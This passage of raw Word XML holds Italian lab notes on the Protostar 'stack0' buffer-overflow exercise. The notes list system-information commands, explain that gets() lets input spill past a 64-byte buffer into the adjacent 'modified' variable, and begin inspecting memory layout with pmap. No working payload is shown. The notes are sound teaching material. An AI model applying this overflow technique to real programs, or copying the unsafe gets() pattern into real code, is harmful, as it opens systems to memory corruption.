          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">raccogliere informazioni sul sistema:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">ArchitetturaHW (32/64 bit, Intel, AMD, altro, ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistema operativo(GNU/Linux, Windows, …) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Metodi di input (locale, remoto,…)</w:t>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t xml:space="preserve">Il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">lsb_release –a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> fornisce informazioni sul sistema operativo in esecuzione.</w:t>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t xml:space="preserve">Il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">arch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">forrnisce informazioni sull'architettura.</w:t>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t xml:space="preserve">Il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cat /proc/cpuinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> fornisce informazioni sui processori installati</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Analizziamo il codice di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">stack0.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:hyperlink r:id="rId12" w:tooltip="https://exploit.education/protostar/stack-zero/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          </w:rPr>
          <w:t xml:space="preserve">https://exploit.education/protostar/stack-zero/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          </w:rPr>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Il programma stampa un messaggio di conferma se la variabile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">modified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">è diversa da zero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">si dovrebbe notare un interessante particolare: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">buffer[64] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">modified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">sono vicine spazialmente. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Saranno anche vicine in memoria centrale?</w:t>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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Se le due variabili sono continue anche in memoria, dovremmo riuscire a sfruttare la loro vicinanza per sovrascrivere la variabile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">modified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">sfruttando la sua vicinanza con la variabile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ipotesi 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">gets(buffer)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> deve permettere l'input di una stringa più lunga di 64 byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">dalla documentazione la funzione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">gets()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> permette input più grandi di 64 byte.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="891"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ipotesi 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">buffer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">deve essere allocata in memoria ad un indirizzo più piccolo di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">apropos –s1 memory layout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">pmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">stampa il layout di memoria di un processo in esecuzione. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">L'output di pmap mostra:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">aree codice (permessi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">r-x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">aree dati costanti (permessi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">r--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">aree dati (permessi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">rw-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">stack (permessi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">rw-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">, nome </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
